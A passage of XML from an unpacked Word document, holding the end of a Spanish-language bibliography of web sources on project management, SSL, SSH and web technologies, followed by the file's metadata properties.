    <b:Year>2018</b:Year>
    <b:Month>MAYO</b:Month>
    <b:Day>17</b:Day>
    <b:URL>https://sites.google.com/site/upcintroagerencia/matriz-de-asignacion-de-responsabilidades-raci</b:URL>
    <b:RefOrder>38</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Que16</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{ED3F0828-3478-4ABC-B54D-14C65C931B41}</b:Guid>
    <b:Title>¿Que es un diagrama de gantt?</b:Title>
    <b:InternetSiteTitle>¿Que es un diagrama de gantt?</b:InternetSiteTitle>
    <b:Year>2016</b:Year>
    <b:Month>Enero</b:Month>
    <b:Day>01</b:Day>
    <b:URL>https://www.obs-edu.com/int/blog-project-management/diagramas-de-gantt/que-es-un-diagrama-de-gantt-y-para-que-sirve</b:URL>
    <b:YearAccessed>2018</b:YearAccessed>
    <b:MonthAccessed>Mayo</b:MonthAccessed>
    <b:DayAccessed>16</b:DayAccessed>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Barcelona</b:Last>
            <b:First>Universitat</b:First>
            <b:Middle>de</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:RefOrder>21</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Inc03</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{9DE9DD76-E41C-4E5B-B385-7C46B3420B2C}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Inc</b:Last>
            <b:First>DigiCert®</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>¿Què es SSL (Secure Sockets Layer)?</b:Title>
    <b:InternetSiteTitle>¿Què es SSL (Secure Sockets Layer)?</b:InternetSiteTitle>
    <b:Year>2003</b:Year>
    <b:Month>Enero</b:Month>
    <b:Day>01</b:Day>
    <b:URL>https://www.digicert.com/es/ssl.htm</b:URL>
    <b:YearAccessed>2018</b:YearAccessed>
    <b:MonthAccessed>Mayo</b:MonthAccessed>
    <b:DayAccessed>18</b:DayAccessed>
    <b:RefOrder>15</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mas18</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{2778CAA1-D2DD-4489-9805-52D7ACE5C4FD}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Massachusetts</b:Last>
            <b:First>Instituto</b:First>
            <b:Middle>de Tecnología de</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Protocolo SSH.</b:Title>
    <b:InternetSiteTitle>Protocolo SSH.</b:InternetSiteTitle>
    <b:Year>2018</b:Year>
    <b:Month>Enero</b:Month>
    <b:Day>01</b:Day>
    <b:URL>http://web.mit.edu/rhel-doc/4/RH-DOCS/rhel-rg-es-4/ch-ssh.html</b:URL>
    <b:YearAccessed>2018</b:YearAccessed>
    <b:MonthAccessed>Mayo</b:MonthAccessed>
    <b:DayAccessed>18</b:DayAccessed>
    <b:RefOrder>16</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Luz13</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{76ECF795-2425-4408-91D3-E842BE78CC5C}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Torres</b:Last>
            <b:First>Luz</b:First>
            <b:Middle>Mariela Ezpinal</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Método de Ruta Crítica – CPM (Critical Path Method) </b:Title>
    <b:InternetSiteTitle>Método de Ruta Crítica – CPM (Critical Path Method) </b:InternetSiteTitle>
    <b:Year>2013</b:Year>
    <b:Month>Abril</b:Month>
    <b:Day>14</b:Day>
    <b:URL>http://www.eoi.es/blogs/madeon/2013/04/14/metodo-de-ruta-critica-cpm-critical-path-method/</b:URL>
    <b:RefOrder>22</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Ecu18</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{005E91AA-CD50-4880-BF23-76A4035A3591}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>EcuRed</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>EcuRed</b:Title>
    <b:InternetSiteTitle>EcuRed</b:InternetSiteTitle>
    <b:Year>2018</b:Year>
    <b:Month>Mayo</b:Month>
    <b:Day>15</b:Day>
    <b:URL>https://www.ecured.cu/CSS3</b:URL>
    <b:RefOrder>39</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Ace18</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{26F21643-AA43-4459-BD78-B23F82C55D5A}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>HTML</b:Last>
            <b:First>Acerca</b:First>
            <b:Middle>de</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Acerca de HTML</b:Title>
    <b:InternetSiteTitle>Manual HTML</b:InternetSiteTitle>
    <b:Year>2018</b:Year>
    <b:Month>Mayo</b:Month>
    <b:Day>15</b:Day>
    <b:URL>http://www.acercadehtml.com/manual-html/que-es-html.html</b:URL>
    <b:RefOrder>40</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Dam07</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{1B3C90D6-FB9C-4B3C-8103-5BC2EC30EA05}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Valdés</b:Last>
            <b:First>Damián</b:First>
            <b:Middle>Pérez</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Mestros de la web</b:Title>
    <b:InternetSiteTitle>Mestros de la web</b:InternetSiteTitle>
    <b:Year>2007</b:Year>
    <b:Month>Noviembre</b:Month>
    <b:Day>02</b:Day>
    <b:URL>http://www.maestrosdelweb.com/los-diferentes-lenguajes-de-programacion-para-la-web/</b:URL>
    <b:RefOrder>41</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>MDN05</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{E092A998-1EED-4F6A-99BB-873590E0385C}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>docs</b:Last>
            <b:First>MDN</b:First>
            <b:Middle>web</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>MDN</b:Title>
    <b:InternetSiteTitle>Mozilla</b:InternetSiteTitle>
    <b:Year>2005</b:Year>
    <b:Month>May</b:Month>
    <b:Day>15</b:Day>
    <b:URL>https://developer.mozilla.org/es/docs/Learn/Getting_started_with_the_web/JavaScript_basics</b:URL>
    <b:RefOrder>42</b:RefOrder>
  </b:Source>
</b:Sources>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{D03C1678-C17A-46CB-8811-04F4CBC840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TotalTime>
  <Pages>141</Pages>
  <Words>21922</Words>
  <Characters>120573</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>1004</Lines>
  <Paragraphs>284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142211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lopez barcenas</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Rude Girl</cp:lastModifiedBy>
  <cp:revision>299</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-05-16T16:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-05-20T00:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>